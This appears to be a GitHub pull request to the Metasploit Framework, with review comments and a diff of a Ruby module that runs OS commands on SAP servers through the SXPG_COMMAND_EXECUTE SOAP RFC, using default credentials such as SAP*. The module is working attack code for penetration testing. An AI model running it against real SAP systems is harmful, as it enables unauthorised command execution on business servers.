Skip to content
This repository

SAP SOAP RFC DBMCLI Command Injection (via SXPG_CALL_SYSTEM) #1030

Merged
merged 7 commits into from over 1 year ago

3 participants

nmonkee Juan Vazquez Brandon Perry
nmonkee

This module makes use of the SXPG_CALL_SYSTEM Remote Function Call (via SOAP) to execute OS commands via DBMCLI command as configured in SM69. See http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection for more information.

modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((30 lines not shown))
  30
+			'Version' => '$Revision: $0.1',
  31
+			'Description' => %q{
  32
+				This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
  33
+				},
  34
+			'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
  35
+			'Author' => [ 'Agnivesh Sathasivam','nmonkee' ],
  36
+			'License' => BSD_LICENSE
  37
+			)
  38
+		register_options(
  39
+			[
  40
+				OptString.new('CLIENT', [true, 'Client', nil]),
  41
+				OptString.new('USER', [true, 'Username', nil]),
  42
+				OptString.new('PASS', [true, 'Password', nil]),
  43
+				OptString.new('CMD', [true, 'Command to be executed', nil]),
  44
+				OptString.new('PARAM', [false, 'Additional parameters', nil]),
  45
+				OptString.new('OS', [true, '1. ANYOS, 2. UNIX, 3. Windows NT, 4. AS/400, 5. OS/400', nil]),
3

Trailing comma

Juan Vazquez Collaborator

If OS commands can be executed maybe it can be converted into an exploit

Juan Vazquez Collaborator

I think you should use OptEnum for the OS option

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((79 lines not shown))
  79
+	data << '</n1:SXPG_COMMAND_EXECUTE>'
  80
+	data << '</env:Body>'
  81
+	data << '</env:Envelope>'
  82
+	user_pass = Rex::Text.encode_base64(datastore['USER'] + ":" + datastore['PASS'])
  83
+	print_status("#{ip}:#{datastore['RPORT']} - sending SOAP SXPG_COMMAND_EXECUTE request")
  84
+	begin
  85
+		res = send_request_raw({
  86
+			'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
  87
+			'method' => 'POST',
  88
+			'data' => data,
  89
+			'headers' =>{
  90
+				'Content-Length' => data.size.to_s,
  91
+				'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
  92
+				'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
  93
+				'Authorization' => 'Basic ' + user_pass,
  94
+				'Content-Type' => 'text/xml; charset=UTF-8',
1

Trailing comma

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((82 lines not shown))
  82
+	user_pass = Rex::Text.encode_base64(datastore['USER'] + ":" + datastore['PASS'])
  83
+	print_status("#{ip}:#{datastore['RPORT']} - sending SOAP SXPG_COMMAND_EXECUTE request")
  84
+	begin
  85
+		res = send_request_raw({
  86
+			'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
  87
+			'method' => 'POST',
  88
+			'data' => data,
  89
+			'headers' =>{
  90
+				'Content-Length' => data.size.to_s,
  91
+				'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
  92
+				'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
  93
+				'Authorization' => 'Basic ' + user_pass,
  94
+				'Content-Type' => 'text/xml; charset=UTF-8',
  95
+				}
  96
+			}, 45)
  97
+		if (res.code != 500 and res.code != 200)
1

if res.code != 500 and res.code != 200

you are also not checking if res is null before evaluating res.code

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((95 lines not shown))
  95
+				}
  96
+			}, 45)
  97
+		if (res.code != 500 and res.code != 200)
  98
+			# to do - implement error handlers for each status code, 404, 301, etc.
  99
+			print_error("#{ip}:#{datastore['RPORT']} - something went wrong!")
  100
+			return
  101
+		else
  102
+			success = true
  103
+			print_status("#{ip}:#{datastore['RPORT']} - got response")
  104
+			saptbl = Msf::Ui::Console::Table.new(
  105
+				Msf::Ui::Console::Table::Style::Default,
  106
+					'Header' => "[SAP] SXPG_COMMAND_EXECUTE ",
  107
+					'Prefix' => "\n",
  108
+					'Postfix' => "\n",
  109
+					'Indent'  => 1,
  110
+					'Columns' =>["Output",]
1

Trailing comma in array?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((100 lines not shown))
  100
+			return
  101
+		else
  102
+			success = true
  103
+			print_status("#{ip}:#{datastore['RPORT']} - got response")
  104
+			saptbl = Msf::Ui::Console::Table.new(
  105
+				Msf::Ui::Console::Table::Style::Default,
  106
+					'Header' => "[SAP] SXPG_COMMAND_EXECUTE ",
  107
+					'Prefix' => "\n",
  108
+					'Postfix' => "\n",
  109
+					'Indent'  => 1,
  110
+					'Columns' =>["Output",]
  111
+					)
  112
+			response = res.body
  113
+			if response =~ /faultstring/
  114
+				error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
  115
+				sucess = false
1

typo

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((103 lines not shown))
  103
+			print_status("#{ip}:#{datastore['RPORT']} - got response")
  104
+			saptbl = Msf::Ui::Console::Table.new(
  105
+				Msf::Ui::Console::Table::Style::Default,
  106
+					'Header' => "[SAP] SXPG_COMMAND_EXECUTE ",
  107
+					'Prefix' => "\n",
  108
+					'Postfix' => "\n",
  109
+					'Indent'  => 1,
  110
+					'Columns' =>["Output",]
  111
+					)
  112
+			response = res.body
  113
+			if response =~ /faultstring/
  114
+				error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
  115
+				sucess = false
  116
+			end
  117
+			output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
  118
+			for i in 0..output.length-1
1

0.upto(output.length-1) do |i|

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((111 lines not shown))
  111
+					)
  112
+			response = res.body
  113
+			if response =~ /faultstring/
  114
+				error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
  115
+				sucess = false
  116
+			end
  117
+			output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
  118
+			for i in 0..output.length-1
  119
+				saptbl << [output[i]]
  120
+			end
  121
+		end
  122
+		rescue ::Rex::ConnectionError
  123
+			print_error("#{ip}:#{datastore['RPORT']} - Unable to connect")
  124
+			return
  125
+		end
  126
+		if success == true
1

if success

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((114 lines not shown))
  114
+				error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
  115
+				sucess = false
  116
+			end
  117
+			output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
  118
+			for i in 0..output.length-1
  119
+				saptbl << [output[i]]
  120
+			end
  121
+		end
  122
+		rescue ::Rex::ConnectionError
  123
+			print_error("#{ip}:#{datastore['RPORT']} - Unable to connect")
  124
+			return
  125
+		end
  126
+		if success == true
  127
+			print(saptbl.to_s)
  128
+		end
  129
+		if sucess == false
1

typo

also, if not success

or

if !success

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((115 lines not shown))
  115
+				sucess = false
  116
+			end
  117
+			output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
  118
+			for i in 0..output.length-1
  119
+				saptbl << [output[i]]
  120
+			end
  121
+		end
  122
+		rescue ::Rex::ConnectionError
  123
+			print_error("#{ip}:#{datastore['RPORT']} - Unable to connect")
  124
+			return
  125
+		end
  126
+		if success == true
  127
+			print(saptbl.to_s)
  128
+		end
  129
+		if sucess == false
  130
+			for i in 0..error.length-1
1

0.upto(error.length-1) do |i|

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Juan Vazquez
Collaborator

msftidy warning should be fixed

$ tools/msftidy.rb modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb 
sap_soap_rfc_sxpg_command_exec.rb:9 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:10 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:12 - [ERROR] Unicode detected: "# Mariano Nu\xC3\xB1ez (the author of the Bizploit framework) helped me in my efforts\n"
sap_soap_rfc_sxpg_command_exec.rb:14 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:15 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:48 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:135 - [WARNING] Spaces at EOL

modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((14 lines not shown))
  14
+# experience - a very cool guy. I'd also like to thank Chris John Riley, 
  15
+# Ian de Villiers and Joris van de Vis who have Beta tested the modules and 
  16
+# provided excellent feedback. Some people just seem to enjoy hacking SAP :)
  17
+##
  18
+
  19
+require 'msf/core'
  20
+
  21
+class Metasploit4 < Msf::Auxiliary
  22
+
  23
+	include Msf::Exploit::Remote::HttpClient
  24
+	include Msf::Auxiliary::Report
  25
+	include Msf::Auxiliary::Scanner
  26
+
  27
+	def initialize
  28
+		super(
  29
+			'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
1
Juan Vazquez Collaborator

A little more descriptive name pls

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((15 lines not shown))
  15
+# Ian de Villiers and Joris van de Vis who have Beta tested the modules and 
  16
+# provided excellent feedback. Some people just seem to enjoy hacking SAP :)
  17
+##
  18
+
  19
+require 'msf/core'
  20
+
  21
+class Metasploit4 < Msf::Auxiliary
  22
+
  23
+	include Msf::Exploit::Remote::HttpClient
  24
+	include Msf::Auxiliary::Report
  25
+	include Msf::Auxiliary::Scanner
  26
+
  27
+	def initialize
  28
+		super(
  29
+			'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
  30
+			'Version' => '$Revision: $0.1',
1
Juan Vazquez Collaborator

version isn't needed anymore

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((19 lines not shown))
  19
+require 'msf/core'
  20
+
  21
+class Metasploit4 < Msf::Auxiliary
  22
+
  23
+	include Msf::Exploit::Remote::HttpClient
  24
+	include Msf::Auxiliary::Report
  25
+	include Msf::Auxiliary::Scanner
  26
+
  27
+	def initialize
  28
+		super(
  29
+			'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
  30
+			'Version' => '$Revision: $0.1',
  31
+			'Description' => %q{
  32
+				This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
  33
+				},
  34
+			'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
1
Juan Vazquez Collaborator

no general references pls

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((21 lines not shown))
  21
+class Metasploit4 < Msf::Auxiliary
  22
+
  23
+	include Msf::Exploit::Remote::HttpClient
  24
+	include Msf::Auxiliary::Report
  25
+	include Msf::Auxiliary::Scanner
  26
+
  27
+	def initialize
  28
+		super(
  29
+			'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
  30
+			'Version' => '$Revision: $0.1',
  31
+			'Description' => %q{
  32
+				This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
  33
+				},
  34
+			'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
  35
+			'Author' => [ 'Agnivesh Sathasivam','nmonkee' ],
  36
+			'License' => BSD_LICENSE
1
Juan Vazquez Collaborator

Can MSF_LICENSE be used?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((17 lines not shown))
  17
+##
  18
+
  19
+require 'msf/core'
  20
+
  21
+class Metasploit4 < Msf::Auxiliary
  22
+
  23
+	include Msf::Exploit::Remote::HttpClient
  24
+	include Msf::Auxiliary::Report
  25
+	include Msf::Auxiliary::Scanner
  26
+
  27
+	def initialize
  28
+		super(
  29
+			'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
  30
+			'Version' => '$Revision: $0.1',
  31
+			'Description' => %q{
  32
+				This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
1
Juan Vazquez Collaborator

No more than 100 columsn per line in the description pls

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
((86 lines not shown))
  86
+			'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
  87
+			'method' => 'POST',
  88
+			'data' => data,
  89
+			'headers' =>{
  90
+				'Content-Length' => data.size.to_s,
  91
+				'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
  92
+				'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
  93
+				'Authorization' => 'Basic ' + user_pass,
  94
+				'Content-Type' => 'text/xml; charset=UTF-8',
  95
+				}
  96
+			}, 45)
  97
+		if (res.code != 500 and res.code != 200)
  98
+			# to do - implement error handlers for each status code, 404, 301, etc.
  99
+			print_error("#{ip}:#{datastore['RPORT']} - something went wrong!")
  100
+			return
  101
+		else
1
Juan Vazquez Collaborator

sure res couldn't be nil here?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Juan Vazquez
Collaborator

This pull request includes the file modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb, isn't the same as #1037 ?

Juan Vazquez
Collaborator

ap haha sorry, can you just delete it (the wrong file) from this branch (sap_soap_rfc_dbmcli_sxpg_call_system_command_exec)?

nmonkee

done

and others added some commits November 19, 2012
Juan Vazquez jvazquez-r7 referenced this pull request from a commit November 20, 2012
up to date to test rapid7#1030 5f99b56
Juan Vazquez jvazquez-r7 referenced this pull request in nmonkee/metasploit-framework November 20, 2012
Merged

up to date to test rapid7#1030 #3

Juan Vazquez
Collaborator

Awesome! looks good, merging! thanks for updating the autor, sorry , my fault!

Juan Vazquez jvazquez-r7 merged commit e16a51f into from November 20, 2012
Juan Vazquez jvazquez-r7 closed this November 20, 2012
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
This page is out of date. Refresh to see the latest.
BIN  modules/auxiliary/scanner/sap/sap.linux.pcap
Binary file not shown
1  modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb
@@ -38,7 +38,6 @@ def initialize
38 38
 				],
39 39
 			'Author' =>
40 40
 				[
41  
-					'Agnivesh Sathasivam',
42 41
 					'nmonkee'
43 42
 				],
44 43
 			'License' => MSF_LICENSE
125  modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
... ...
@@ -0,0 +1,125 @@
  1
+##
  2
+# This file is part of the Metasploit Framework and may be subject to
  3
+# redistribution and commercial restrictions. Please see the Metasploit
  4
+# Framework web site for more information on licensing and terms of use.
  5
+# http://metasploit.com/framework/
  6
+##
  7
+
  8
+##
  9
+# This module is based on, inspired by, or is a port of a plugin available in
  10
+# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
  11
+# http://www.onapsis.com/research-free-solutions.php.
  12
+# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
  13
+# in producing the Metasploit modules and was happy to share his knowledge and
  14
+# experience - a very cool guy. I'd also like to thank Chris John Riley,
  15
+# Ian de Villiers and Joris van de Vis who have Beta tested the modules and
  16
+# provided excellent feedback. Some people just seem to enjoy hacking SAP :)
  17
+##
  18
+
  19
+require 'msf/core'
  20
+
  21
+class Metasploit4 < Msf::Auxiliary
  22
+
  23
+	include Msf::Exploit::Remote::HttpClient
  24
+	include Msf::Auxiliary::Report
  25
+	include Msf::Auxiliary::Scanner
  26
+
  27
+	def initialize
  28
+		super(
  29
+			'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
  30
+			'Description' => %q{
  31
+					This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call, through
  32
+				the use of the /sap/bc/soap/rfc SOAP service to execute OS commands as configured
  33
+				in the SM69 transaction.
  34
+				},
  35
+			'References' =>
  36
+				[
  37
+					[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]
  38
+				],
  39
+			'Author' =>
  40
+				[
  41
+					'Agnivesh Sathasivam',
  42
+					'nmonkee'
  43
+				],
  44
+			'License' => MSF_LICENSE
  45
+		)
  46
+		register_options(
  47
+			[
  48
+				Opt::RPORT(8000),
  49
+				OptString.new('CLIENT', [true, 'SAP Client', '001']),
  50
+				OptString.new('USERNAME', [true, 'Username', 'SAP*']),
  51
+				OptString.new('PASSWORD', [true, 'Password', '06071992']),
  52
+				OptString.new('CMD', [true, 'SM69 command to be executed', nil]),
  53
+				OptString.new('PARAM', [false, 'Additional parameters for the SM69 command', nil]),
  54
+				OptEnum.new('OS', [true, 'SM69 Target OS','ANYOS',['ANYOS', 'UNIX', 'Windows NT', 'AS/400', 'OS/400']])
  55
+			], self.class)
  56
+	end
  57
+
  58
+	def run_host(ip)
  59
+		os = datastore['OS']
  60
+		data = '<?xml version="1.0" encoding="utf-8" ?>'
  61
+		data << '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
  62
+		data << '<env:Body>'
  63
+		data << '<n1:SXPG_COMMAND_EXECUTE xmlns:n1="urn:sap-com:document:sap:rfc:functions" env:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
  64
+		if datastore['PARAM']
  65
+			data << '<ADDITIONAL_PARAMETERS>' + datastore['PARAM'] + ' </ADDITIONAL_PARAMETERS>'
  66
+		else
  67
+			data << '<ADDITIONAL_PARAMETERS> </ADDITIONAL_PARAMETERS>'
  68
+		end
  69
+		data << '<COMMANDNAME>' + datastore['CMD'] + '</COMMANDNAME>'
  70
+		data << '<OPERATINGSYSTEM>' + os + '</OPERATINGSYSTEM>'
  71
+		data << '<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>'
  72
+		data << '</n1:SXPG_COMMAND_EXECUTE>'
  73
+		data << '</env:Body>'
  74
+		data << '</env:Envelope>'
  75
+		user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
  76
+		print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
  77
+		begin
  78
+			res = send_request_raw({
  79
+				'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
  80
+				'method' => 'POST',
  81
+				'data' => data,
  82
+				'headers' =>{
  83
+					'Content-Length' => data.size.to_s,
  84
+					'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
  85
+					'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
  86
+					'Authorization' => 'Basic ' + user_pass,
  87
+					'Content-Type' => 'text/xml; charset=UTF-8'
  88
+					}
  89
+				}, 45)
  90
+			if res and res.code != 500 and res.code != 200
  91
+				# to do - implement error handlers for each status code, 404, 301, etc.
  92
+				print_error("[SAP] #{ip}:#{rport} - something went wrong!")
  93
+				return
  94
+			elsif res and res.body =~ /faultstring/
  95
+				error = res.body.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
  96
+				0.upto(error.length-1) do |i|
  97
+					print_error("[SAP] #{ip}:#{rport} - error #{error[i]}")
  98
+				end
  99
+				return
  100
+			elsif res
  101
+				print_status("[SAP] #{ip}:#{rport} - got response")
  102
+				saptbl = Msf::Ui::Console::Table.new(
  103
+					Msf::Ui::Console::Table::Style::Default,
  104
+						'Header' => "[SAP] SXPG_COMMAND_EXECUTE ",
  105
+						'Prefix' => "\n",
  106
+						'Postfix' => "\n",
  107
+						'Indent'  => 1,
  108
+						'Columns' =>["Output",]
  109
+						)
  110
+				output = res.body.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
  111
+				for i in 0..output.length-1
  112
+					saptbl << [output[i]]
  113
+				end
  114
+				print(saptbl.to_s)
  115
+				return
  116
+			else
  117
+				print_error("[SAP] #{ip}:#{rport} - Unknown error")
  118
+				return
  119
+			end
  120
+		rescue ::Rex::ConnectionError
  121
+			print_error("[SAP] #{ip}:#{rport} - Unable to connect")
  122
+			return
  123
+		end
  124
+	end
  125
+end
Commit_comment_tip

Tip: You can add notes to lines in a file. Hover to the left of a line to make a note

Something went wrong with that request. Please try again.